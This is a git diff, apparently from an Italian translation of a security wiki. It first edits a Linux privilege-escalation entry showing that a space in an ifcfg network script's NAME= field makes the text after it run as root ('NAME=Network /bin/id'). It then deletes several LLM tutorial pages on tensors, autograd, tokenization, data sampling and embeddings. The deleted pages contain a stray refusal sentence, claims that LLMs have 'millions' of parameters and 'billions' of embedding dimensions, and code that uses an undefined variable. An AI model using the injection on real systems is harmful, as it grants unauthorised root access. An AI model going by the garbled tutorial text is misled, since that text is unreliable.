+Gli script di rete, _ifcg-eth0_ ad esempio, sono utilizzati per le connessioni di rete. Sembrano esattamente come file .INI. Tuttavia, sono \~sourced\~ su Linux dal Network Manager (dispatcher.d).

-Nel mio caso, il `NAME=` attribuito in questi script di rete non viene gestito correttamente. Se hai **spazio bianco/vuoto nel nome, il sistema tenta di eseguire la parte dopo lo spazio bianco/vuoto**. Questo significa che **tutto dopo il primo spazio vuoto viene eseguito come root**.
+Nel mio caso, il `NAME=` attribuito in questi script di rete non è gestito correttamente. Se hai **spazio bianco/nullo nel nome, il sistema tenta di eseguire la parte dopo lo spazio bianco/nullo**. Questo significa che **tutto dopo il primo spazio bianco viene eseguito come root**.

-Ad esempio: _/etc/sysconfig/network-scripts/ifcfg-1337_
+Per esempio: _/etc/sysconfig/network-scripts/ifcfg-1337_
 ```bash
 NAME=Network /bin/id
 ONBOOT=yes
--- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
+++ b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
@ -1,285 +0,0 @@
-# 0. Concetti di base sugli LLM
-
-## Pretraining
-
-Il pretraining è la fase fondamentale nello sviluppo di un modello di linguaggio di grandi dimensioni (LLM) in cui il modello è esposto a enormi e diversificati volumi di dati testuali. Durante questa fase, **l'LLM apprende le strutture, i modelli e le sfumature fondamentali del linguaggio**, inclusi grammatica, vocabolario, sintassi e relazioni contestuali. Elaborando questi dati estesi, il modello acquisisce una comprensione ampia del linguaggio e della conoscenza generale del mondo. Questa base completa consente all'LLM di generare testi coerenti e contestualmente rilevanti. Successivamente, questo modello preaddestrato può subire un fine-tuning, in cui viene ulteriormente addestrato su dataset specializzati per adattare le sue capacità a compiti o domini specifici, migliorando le sue prestazioni e rilevanza in applicazioni mirate.
-
-## Componenti principali degli LLM
-
-Di solito, un LLM è caratterizzato dalla configurazione utilizzata per addestrarlo. Questi sono i componenti comuni quando si addestra un LLM:
-
- **Parametri**: I parametri sono i **pesi e i bias apprendibili** nella rete neurale. Questi sono i numeri che il processo di addestramento regola per minimizzare la funzione di perdita e migliorare le prestazioni del modello sul compito. Gli LLM di solito utilizzano milioni di parametri.
- **Lunghezza del contesto**: Questa è la lunghezza massima di ciascuna frase utilizzata per pre-addestrare l'LLM.
- **Dimensione dell'embedding**: La dimensione del vettore utilizzato per rappresentare ciascun token o parola. Gli LLM di solito utilizzano miliardi di dimensioni.
- **Dimensione nascosta**: La dimensione degli strati nascosti nella rete neurale.
- **Numero di strati (Profondità)**: Quanti strati ha il modello. Gli LLM di solito utilizzano decine di strati.
- **Numero di teste di attenzione**: Nei modelli transformer, questo è il numero di meccanismi di attenzione separati utilizzati in ciascun strato. Gli LLM di solito utilizzano decine di teste.
- **Dropout**: Il dropout è qualcosa come la percentuale di dati che viene rimossa (le probabilità diventano 0) durante l'addestramento utilizzato per **prevenire l'overfitting.** Gli LLM di solito utilizzano tra 0-20%.
-
-Configurazione del modello GPT-2:
-```json
-GPT_CONFIG_124M = {
-"vocab_size": 50257,  // Vocabulary size of the BPE tokenizer
-"context_length": 1024, // Context length
-"emb_dim": 768,       // Embedding dimension
-"n_heads": 12,        // Number of attention heads
-"n_layers": 12,       // Number of layers
-"drop_rate": 0.1,     // Dropout rate: 10%
-"qkv_bias": False     // Query-Key-Value bias
-}
-```
-## Tensors in PyTorch
-
-In PyTorch, un **tensor** è una struttura dati fondamentale che funge da array multidimensionale, generalizzando concetti come scalari, vettori e matrici a dimensioni potenzialmente superiori. I tensori sono il modo principale in cui i dati sono rappresentati e manipolati in PyTorch, specialmente nel contesto del deep learning e delle reti neurali.
-
-### Concetto Matematico di Tensors
-
- **Scalari**: Tensors di rango 0, che rappresentano un singolo numero (zero-dimensionale). Come: 5
- **Vettori**: Tensors di rango 1, che rappresentano un array unidimensionale di numeri. Come: \[5,1]
- **Matrici**: Tensors di rango 2, che rappresentano array bidimensionali con righe e colonne. Come: \[\[1,3], \[5,2]]
- **Tensors di Rango Superiore**: Tensors di rango 3 o superiore, che rappresentano dati in dimensioni superiori (ad esempio, tensori 3D per immagini a colori).
-
-### Tensors come Contenitori di Dati
-
-Da una prospettiva computazionale, i tensori agiscono come contenitori per dati multidimensionali, dove ogni dimensione può rappresentare diverse caratteristiche o aspetti dei dati. Questo rende i tensori altamente adatti per gestire set di dati complessi in compiti di machine learning.
-
-### Tensors di PyTorch vs. Array NumPy
-
-Sebbene i tensori di PyTorch siano simili agli array NumPy nella loro capacità di memorizzare e manipolare dati numerici, offrono funzionalità aggiuntive cruciali per il deep learning:
-
- **Differenziazione Automatica**: I tensori di PyTorch supportano il calcolo automatico dei gradienti (autograd), il che semplifica il processo di calcolo delle derivate necessarie per l'addestramento delle reti neurali.
- **Accelerazione GPU**: I tensori in PyTorch possono essere spostati e calcolati su GPU, accelerando significativamente i calcoli su larga scala.
-
-### Creazione di Tensors in PyTorch
-
-Puoi creare tensori utilizzando la funzione `torch.tensor`:
-```python
-pythonCopy codeimport torch
-
-# Scalar (0D tensor)
-tensor0d = torch.tensor(1)
-
-# Vector (1D tensor)
-tensor1d = torch.tensor([1, 2, 3])
-
-# Matrix (2D tensor)
-tensor2d = torch.tensor([[1, 2],
-[3, 4]])
-
-# 3D Tensor
-tensor3d = torch.tensor([[[1, 2], [3, 4]],
-[[5, 6], [7, 8]]])
-```
-### Tipi di Dati Tensor
-
-I tensori PyTorch possono memorizzare dati di vari tipi, come interi e numeri in virgola mobile.
-
-Puoi controllare il tipo di dato di un tensore utilizzando l'attributo `.dtype`:
-```python
-tensor1d = torch.tensor([1, 2, 3])
-print(tensor1d.dtype)  # Output: torch.int64
-```
- I tensori creati da interi Python sono di tipo `torch.int64`.
- I tensori creati da float Python sono di tipo `torch.float32`.
-
-Per cambiare il tipo di dato di un tensore, usa il metodo `.to()`:
-```python
-float_tensor = tensor1d.to(torch.float32)
-print(float_tensor.dtype)  # Output: torch.float32
-```
-### Operazioni Tensoriali Comuni
-
-PyTorch fornisce una varietà di operazioni per manipolare i tensori:
-
- **Accesso alla Forma**: Usa `.shape` per ottenere le dimensioni di un tensore.
-
-```python
-print(tensor2d.shape)  # Output: torch.Size([2, 2])
-```
-
- **Riformattazione dei Tensori**: Usa `.reshape()` o `.view()` per cambiare la forma.
-
-```python
-reshaped = tensor2d.reshape(4, 1)
-```
-
- **Trasposizione dei Tensori**: Usa `.T` per trasporre un tensore 2D.
-
-```python
-transposed = tensor2d.T
-```
-
- **Moltiplicazione Matriciale**: Usa `.matmul()` o l'operatore `@`.
-
-```python
-result = tensor2d @ tensor2d.T
-```
-
-### Importanza nel Deep Learning
-
-I tensori sono essenziali in PyTorch per costruire e addestrare reti neurali:
-
- Memorizzano i dati di input, i pesi e i bias.
- Facilitano le operazioni necessarie per i passaggi in avanti e indietro negli algoritmi di addestramento.
- Con autograd, i tensori abilitano il calcolo automatico dei gradienti, semplificando il processo di ottimizzazione.
-
-## Differenziazione Automatica
-
-La differenziazione automatica (AD) è una tecnica computazionale utilizzata per **valutare le derivate (gradienti)** delle funzioni in modo efficiente e accurato. Nel contesto delle reti neurali, l'AD consente il calcolo dei gradienti necessari per **algoritmi di ottimizzazione come il gradiente discendente**. PyTorch fornisce un motore di differenziazione automatica chiamato **autograd** che semplifica questo processo.
-
-### Spiegazione Matematica della Differenziazione Automatica
-
-**1. La Regola della Catena**
-
-Al centro della differenziazione automatica c'è la **regola della catena** del calcolo. La regola della catena afferma che se hai una composizione di funzioni, la derivata della funzione composita è il prodotto delle derivate delle funzioni composte.
-
-Matematicamente, se `y=f(u)` e `u=g(x)`, allora la derivata di `y` rispetto a `x` è:
-
-<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-**2. Grafo Computazionale**
-
-Nell'AD, i calcoli sono rappresentati come nodi in un **grafo computazionale**, dove ogni nodo corrisponde a un'operazione o a una variabile. Attraversando questo grafo, possiamo calcolare le derivate in modo efficiente.
-
-3. Esempio
-
-Consideriamo una funzione semplice:
-
-<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-Dove:
-
- `σ(z)` è la funzione sigmoide.
- `y=1.0` è l'etichetta target.
- `L` è la perdita.
-
-Vogliamo calcolare il gradiente della perdita `L` rispetto al peso `w` e al bias `b`.
-
-**4. Calcolo Manuale dei Gradienti**
-
-<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-**5. Calcolo Numerico**
-
-<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-### Implementazione della Differenziazione Automatica in PyTorch
-
-Ora, vediamo come PyTorch automatizza questo processo.
-```python
-pythonCopy codeimport torch
-import torch.nn.functional as F
-
-# Define input and target
-x = torch.tensor([1.1])
-y = torch.tensor([1.0])
-
-# Initialize weights with requires_grad=True to track computations
-w = torch.tensor([2.2], requires_grad=True)
-b = torch.tensor([0.0], requires_grad=True)
-
-# Forward pass
-z = x * w + b
-a = torch.sigmoid(z)
-loss = F.binary_cross_entropy(a, y)
-
-# Backward pass
-loss.backward()
-
-# Gradients
-print("Gradient w.r.t w:", w.grad)
-print("Gradient w.r.t b:", b.grad)
-```
-I'm sorry, but I cannot provide the content you requested.
-```css
-cssCopy codeGradient w.r.t w: tensor([-0.0898])
-Gradient w.r.t b: tensor([-0.0817])
-```
-## Backpropagation in Bigger Neural Networks
-
-### **1.Extending to Multilayer Networks**
-
-In reti neurali più grandi con più strati, il processo di calcolo dei gradienti diventa più complesso a causa dell'aumento del numero di parametri e operazioni. Tuttavia, i principi fondamentali rimangono gli stessi:
-
- **Forward Pass:** Calcola l'output della rete passando gli input attraverso ciascun strato.
- **Compute Loss:** Valuta la funzione di perdita utilizzando l'output della rete e le etichette target.
- **Backward Pass (Backpropagation):** Calcola i gradienti della perdita rispetto a ciascun parametro nella rete applicando la regola della catena in modo ricorsivo dall'output fino allo strato di input.
-
-### **2. Backpropagation Algorithm**
-
- **Step 1:** Inizializza i parametri della rete (pesi e bias).
- **Step 2:** Per ciascun esempio di addestramento, esegui un forward pass per calcolare gli output.
- **Step 3:** Calcola la perdita.
- **Step 4:** Calcola i gradienti della perdita rispetto a ciascun parametro utilizzando la regola della catena.
- **Step 5:** Aggiorna i parametri utilizzando un algoritmo di ottimizzazione (ad es., discesa del gradiente).
-
-### **3. Mathematical Representation**
-
-Considera una semplice rete neurale con uno strato nascosto:
-
-<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
-
-### **4. PyTorch Implementation**
-
-PyTorch semplifica questo processo con il suo motore autograd.
-```python
-import torch
-import torch.nn as nn
-import torch.optim as optim
-
-# Define a simple neural network
-class SimpleNet(nn.Module):
-def __init__(self):
-super(SimpleNet, self).__init__()
-self.fc1 = nn.Linear(10, 5)  # Input layer to hidden layer
-self.relu = nn.ReLU()
-self.fc2 = nn.Linear(5, 1)   # Hidden layer to output layer
-self.sigmoid = nn.Sigmoid()
-
-def forward(self, x):
-h = self.relu(self.fc1(x))
-y_hat = self.sigmoid(self.fc2(h))
-return y_hat
-
-# Instantiate the network
-net = SimpleNet()
-
-# Define loss function and optimizer
-criterion = nn.BCELoss()
-optimizer = optim.SGD(net.parameters(), lr=0.01)
-
-# Sample data
-inputs = torch.randn(1, 10)
-labels = torch.tensor([1.0])
-
-# Training loop
-optimizer.zero_grad()          # Clear gradients
-outputs = net(inputs)          # Forward pass
-loss = criterion(outputs, labels)  # Compute loss
-loss.backward()                # Backward pass (compute gradients)
-optimizer.step()               # Update parameters
-
-# Accessing gradients
-for name, param in net.named_parameters():
-if param.requires_grad:
-print(f"Gradient of {name}: {param.grad}")
-```
-In questo codice:
-
- **Forward Pass:** Calcola le uscite della rete.
- **Backward Pass:** `loss.backward()` calcola i gradienti della perdita rispetto a tutti i parametri.
- **Parameter Update:** `optimizer.step()` aggiorna i parametri in base ai gradienti calcolati.
-
-### **5. Comprendere il Backward Pass**
-
-Durante il backward pass:
-
- PyTorch attraversa il grafo computazionale in ordine inverso.
- Per ogni operazione, applica la regola della catena per calcolare i gradienti.
- I gradienti vengono accumulati nell'attributo `.grad` di ciascun tensore parametro.
-
-### **6. Vantaggi della Differenziazione Automatica**
-
- **Efficienza:** Evita calcoli ridondanti riutilizzando risultati intermedi.
- **Accuratezza:** Fornisce derivate esatte fino alla precisione della macchina.
- **Facilità d'uso:** Elimina il calcolo manuale delle derivate.
--- a/src/todo/llm-training-data-preparation/1.-tokenizing.md
+++ b/src/todo/llm-training-data-preparation/1.-tokenizing.md
@ -1,95 +0,0 @@
-# 1. Tokenizzazione
-
-## Tokenizzazione
-
-**Tokenizzazione** è il processo di suddivisione dei dati, come il testo, in pezzi più piccoli e gestibili chiamati _token_. Ogni token viene quindi assegnato a un identificatore numerico unico (ID). Questo è un passaggio fondamentale nella preparazione del testo per l'elaborazione da parte dei modelli di machine learning, specialmente nel natural language processing (NLP).
-
-> [!TIP]
-> L'obiettivo di questa fase iniziale è molto semplice: **Dividere l'input in token (ids) in un modo che abbia senso**.
-
-### **Come Funziona la Tokenizzazione**
-
-1. **Suddivisione del Testo:**
- **Tokenizzatore di Base:** Un tokenizzatore semplice potrebbe suddividere il testo in parole e segni di punteggiatura individuali, rimuovendo gli spazi.
- _Esempio:_\
-Testo: `"Ciao, mondo!"`\
-Token: `["Ciao", ",", "mondo", "!"]`
-2. **Creazione di un Vocabolario:**
- Per convertire i token in ID numerici, viene creato un **vocabolario**. Questo vocabolario elenca tutti i token unici (parole e simboli) e assegna a ciascuno un ID specifico.
- **Token Speciali:** Questi sono simboli speciali aggiunti al vocabolario per gestire vari scenari:
- `[BOS]` (Inizio Sequenza): Indica l'inizio di un testo.
- `[EOS]` (Fine Sequenza): Indica la fine di un testo.
- `[PAD]` (Padding): Usato per rendere tutte le sequenze in un batch della stessa lunghezza.
- `[UNK]` (Sconosciuto): Rappresenta token che non sono nel vocabolario.
- _Esempio:_\
-Se `"Ciao"` è assegnato ID `64`, `","` è `455`, `"mondo"` è `78`, e `"!"` è `467`, allora:\
-`"Ciao, mondo!"` → `[64, 455, 78, 467]`
- **Gestione delle Parole Sconosciute:**\
-Se una parola come `"Addio"` non è nel vocabolario, viene sostituita con `[UNK]`.\
-`"Addio, mondo!"` → `["[UNK]", ",", "mondo", "!"]` → `[987, 455, 78, 467]`\
-_(Assumendo che `[UNK]` abbia ID `987`)_
-
-### **Metodi di Tokenizzazione Avanzati**
-
-Mentre il tokenizzatore di base funziona bene per testi semplici, ha limitazioni, specialmente con vocabolari ampi e nella gestione di parole nuove o rare. I metodi di tokenizzazione avanzati affrontano questi problemi suddividendo il testo in sottounità più piccole o ottimizzando il processo di tokenizzazione.
-
-1. **Byte Pair Encoding (BPE):**
- **Scopo:** Riduce la dimensione del vocabolario e gestisce parole rare o sconosciute suddividendole in coppie di byte frequentemente occorrenti.
- **Come Funziona:**
- Inizia con caratteri individuali come token.
- Unisce iterativamente le coppie di token più frequenti in un singolo token.
- Continua fino a quando non ci sono più coppie frequenti da unire.
- **Vantaggi:**
- Elimina la necessità di un token `[UNK]` poiché tutte le parole possono essere rappresentate combinando token di sottoparola esistenti.
- Vocabolario più efficiente e flessibile.
- _Esempio:_\
-`"giocando"` potrebbe essere tokenizzato come `["gioca", "ndo"]` se `"gioca"` e `"ndo"` sono sottoparole frequenti.
-2. **WordPiece:**
- **Usato Da:** Modelli come BERT.
- **Scopo:** Simile a BPE, suddivide le parole in unità di sottoparola per gestire parole sconosciute e ridurre la dimensione del vocabolario.
- **Come Funziona:**
- Inizia con un vocabolario di base di caratteri individuali.
- Aggiunge iterativamente la sottoparola più frequente che massimizza la probabilità dei dati di addestramento.
- Utilizza un modello probabilistico per decidere quali sottoparole unire.
- **Vantaggi:**
- Bilancia tra avere una dimensione del vocabolario gestibile e rappresentare efficacemente le parole.
- Gestisce in modo efficiente parole rare e composte.
- _Esempio:_\
-`"infelicità"` potrebbe essere tokenizzato come `["in", "felicità"]` o `["in", "felice", "tà"]` a seconda del vocabolario.
-3. **Unigram Language Model:**
- **Usato Da:** Modelli come SentencePiece.
- **Scopo:** Utilizza un modello probabilistico per determinare il set di token di sottoparola più probabile.
- **Come Funziona:**
- Inizia con un ampio set di token potenziali.
- Rimuove iterativamente i token che migliorano meno la probabilità del modello sui dati di addestramento.
- Finalizza un vocabolario in cui ogni parola è rappresentata dalle unità di sottoparola più probabili.
- **Vantaggi:**
- Flessibile e può modellare il linguaggio in modo più naturale.
- Risultati spesso in tokenizzazioni più efficienti e compatte.
- _Esempio:_\
-`"internazionalizzazione"` potrebbe essere tokenizzato in sottoparole più piccole e significative come `["internazionale", "izzazione"]`.
-
-## Esempio di Codice
-
-Comprendiamo meglio questo attraverso un esempio di codice da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
-```python
-# Download a text to pre-train the model
-import urllib.request
-url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
-file_path = "the-verdict.txt"
-urllib.request.urlretrieve(url, file_path)
-
-with open("the-verdict.txt", "r", encoding="utf-8") as f:
-raw_text = f.read()
-
-# Tokenize the code using GPT2 tokenizer version
-import tiktoken
-token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"}) # Allow the user of the tag "[EOS]"
-
-# Print first 50 tokens
-print(token_ids[:50])
-#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
-```
-## Riferimenti
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
--- a/src/todo/llm-training-data-preparation/2.-data-sampling.md
+++ b/src/todo/llm-training-data-preparation/2.-data-sampling.md
@ -1,240 +0,0 @@
-# 2. Data Sampling
-
-## **Data Sampling**
-
-**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.
-
-> [!TIP]
-> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
-
-### **Why Data Sampling Matters**
-
-LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.
-
-### **Key Concepts in Data Sampling**
-
-1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
-2. **Sequence Length (max_length):** The number of tokens in each input sequence.
-3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
-4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.
-
-### **Step-by-Step Example**
-
-Let's walk through an example to illustrate data sampling.
-
-**Example Text**
-
-```arduino
-"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
-```
-
-**Tokenization**
-
-Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:
-
-```vbnet
-Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
-```
-
-**Parameters**
-
- **Max Sequence Length (max_length):** 4 tokens
- **Sliding Window Stride:** 1 token
-
-**Creating Input and Target Sequences**
-
-1. **Sliding Window Approach:**
-   - **Input Sequences:** Each input sequence consists of `max_length` tokens.
-   - **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
-2. **Generating Sequences:**
-
-   <table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>
-
-3. **Resulting Input and Target Arrays:**
-
-   - **Input:**
-
-     ```python
-     [
-       ["Lorem", "ipsum", "dolor", "sit"],
-       ["ipsum", "dolor", "sit", "amet,"],
-       ["dolor", "sit", "amet,", "consectetur"],
-       ["sit", "amet,", "consectetur", "adipiscing"],
-     ]
-     ```
-
-   - **Target:**
-
-     ```python
-     [
-       ["ipsum", "dolor", "sit", "amet,"],
-       ["dolor", "sit", "amet,", "consectetur"],
-       ["sit", "amet,", "consectetur", "adipiscing"],
-       ["amet,", "consectetur", "adipiscing", "elit."],
-     ]
-     ```
-
-**Visual Representation**
-
-<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>
-
-**Sliding Window with Stride 1:**
-
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]
-
-**Understanding Stride**
-
- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.
-
-**Example with Stride of 2:**
-
-Using the same tokenized text and `max_length` of 4:
-
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_
-
-## Code Example
-
-Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
-
-```python
-# Download the text to pre-train the LLM
-import urllib.request
-url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
-file_path = "the-verdict.txt"
-urllib.request.urlretrieve(url, file_path)
-
-with open("the-verdict.txt", "r", encoding="utf-8") as f:
-    raw_text = f.read()
-
-"""
-Create a class that will receive some params lie tokenizer and text
-and will prepare the input chunks and the target chunks to prepare
-the LLM to learn which next token to generate
-"""
-import torch
-from torch.utils.data import Dataset, DataLoader
-
-class GPTDatasetV1(Dataset):
-    def __init__(self, txt, tokenizer, max_length, stride):
-        self.input_ids = []
-        self.target_ids = []
-
-        # Tokenize the entire text
-        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
-
-        # Use a sliding window to chunk the book into overlapping sequences of max_length
-        for i in range(0, len(token_ids) - max_length, stride):
-            input_chunk = token_ids[i:i + max_length]
-            target_chunk = token_ids[i + 1: i + max_length + 1]
-            self.input_ids.append(torch.tensor(input_chunk))
-            self.target_ids.append(torch.tensor(target_chunk))
-
-    def __len__(self):
-        return len(self.input_ids)
-
-    def __getitem__(self, idx):
-        return self.input_ids[idx], self.target_ids[idx]
-
-
-"""
-Create a data loader which given the text and some params will
-prepare the inputs and targets with the previous class and
-then create a torch DataLoader with the info
-"""
-
-import tiktoken
-
-def create_dataloader_v1(txt, batch_size=4, max_length=256,
-                         stride=128, shuffle=True, drop_last=True,
-                         num_workers=0):
-
-    # Initialize the tokenizer
-    tokenizer = tiktoken.get_encoding("gpt2")
-
-    # Create dataset
-    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
-
-    # Create dataloader
-    dataloader = DataLoader(
-        dataset,
-        batch_size=batch_size,
-        shuffle=shuffle,
-        drop_last=drop_last,
-        num_workers=num_workers
-    )
-
-    return dataloader
-
-
-"""
-Finally, create the data loader with the params we want:
- The used text for training
- batch_size: The size of each batch
- max_length: The size of each entry on each batch
- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting, usually this is equals to the max_length so the same tokens aren't repeated.
- shuffle: Re-order randomly
-"""
-dataloader = create_dataloader_v1(
-    raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
-)
-
-data_iter = iter(dataloader)
-first_batch = next(data_iter)
-print(first_batch)
-
-# Note the batch_size of 8, the max_length of 4 and the stride of 1
-[
-# Input
-tensor([[   40,   367,  2885,  1464],
-        [  367,  2885,  1464,  1807],
-        [ 2885,  1464,  1807,  3619],
-        [ 1464,  1807,  3619,   402],
-        [ 1807,  3619,   402,   271],
-        [ 3619,   402,   271, 10899],
-        [  402,   271, 10899,  2138],
-        [  271, 10899,  2138,   257]]),
-# Target
-tensor([[  367,  2885,  1464,  1807],
-        [ 2885,  1464,  1807,  3619],
-        [ 1464,  1807,  3619,   402],
-        [ 1807,  3619,   402,   271],
-        [ 3619,   402,   271, 10899],
-        [  402,   271, 10899,  2138],
-        [  271, 10899,  2138,   257],
-        [10899,  2138,   257,  7026]])
-]
-
-# With stride=4 this will be the result:
-[
-# Input
-tensor([[   40,   367,  2885,  1464],
-        [ 1807,  3619,   402,   271],
-        [10899,  2138,   257,  7026],
-        [15632,   438,  2016,   257],
-        [  922,  5891,  1576,   438],
-        [  568,   340,   373,   645],
-        [ 1049,  5975,   284,   502],
-        [  284,  3285,   326,    11]]),
-# Target
-tensor([[  367,  2885,  1464,  1807],
-        [ 3619,   402,   271, 10899],
-        [ 2138,   257,  7026, 15632],
-        [  438,  2016,   257,   922],
-        [ 5891,  1576,   438,   568],
-        [  340,   373,   645,  1049],
-        [ 5975,   284,   502,   284],
-        [ 3285,   326,    11,   287]])
-]
-```
-
-## References
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
--- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md
+++ b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
@ -1,203 +0,0 @@
-# 3. Token Embeddings
-
-## Token Embeddings
-
-Dopo la tokenizzazione dei dati testuali, il passo critico successivo nella preparazione dei dati per l'addestramento di modelli di linguaggio di grandi dimensioni (LLM) come GPT è la creazione di **token embeddings**. I token embeddings trasformano token discreti (come parole o sottoparole) in vettori numerici continui che il modello può elaborare e da cui può apprendere. Questa spiegazione analizza i token embeddings, la loro inizializzazione, utilizzo e il ruolo degli embeddings posizionali nel migliorare la comprensione del modello delle sequenze di token.
-
-> [!TIP]
-> L'obiettivo di questa terza fase è molto semplice: **Assegnare a ciascuno dei token precedenti nel vocabolario un vettore delle dimensioni desiderate per addestrare il modello.** Ogni parola nel vocabolario avrà un punto in uno spazio di X dimensioni.\
-> Nota che inizialmente la posizione di ciascuna parola nello spazio è semplicemente inizializzata "randomicamente" e queste posizioni sono parametri addestrabili (saranno migliorati durante l'addestramento).
->
-> Inoltre, durante il token embedding **viene creata un'altra layer di embeddings** che rappresenta (in questo caso) la **posizione assoluta della parola nella frase di addestramento**. In questo modo, una parola in posizioni diverse nella frase avrà una rappresentazione (significato) diversa.
-
-### **Cosa Sono i Token Embeddings?**
-
-**Token Embeddings** sono rappresentazioni numeriche di token in uno spazio vettoriale continuo. Ogni token nel vocabolario è associato a un vettore unico di dimensioni fisse. Questi vettori catturano informazioni semantiche e sintattiche sui token, consentendo al modello di comprendere relazioni e schemi nei dati.
-
- **Dimensione del Vocabolario:** Il numero totale di token unici (ad es., parole, sottoparole) nel vocabolario del modello.
- **Dimensioni dell'Embedding:** Il numero di valori numerici (dimensioni) nel vettore di ciascun token. Dimensioni più elevate possono catturare informazioni più sfumate ma richiedono più risorse computazionali.
-
-**Esempio:**
-
- **Dimensione del Vocabolario:** 6 token \[1, 2, 3, 4, 5, 6]
- **Dimensioni dell'Embedding:** 3 (x, y, z)
-
-### **Inizializzazione dei Token Embeddings**
-
-All'inizio dell'addestramento, i token embeddings vengono tipicamente inizializzati con piccoli valori casuali. Questi valori iniziali vengono regolati (ottimizzati) durante l'addestramento per rappresentare meglio i significati dei token in base ai dati di addestramento.
-
-**Esempio PyTorch:**
-```python
-import torch
-
-# Set a random seed for reproducibility
-torch.manual_seed(123)
-
-# Create an embedding layer with 6 tokens and 3 dimensions
-embedding_layer = torch.nn.Embedding(6, 3)
-
-# Display the initial weights (embeddings)
-print(embedding_layer.weight)
-```
-**Uscita:**
-```lua
-luaCopy codeParameter containing:
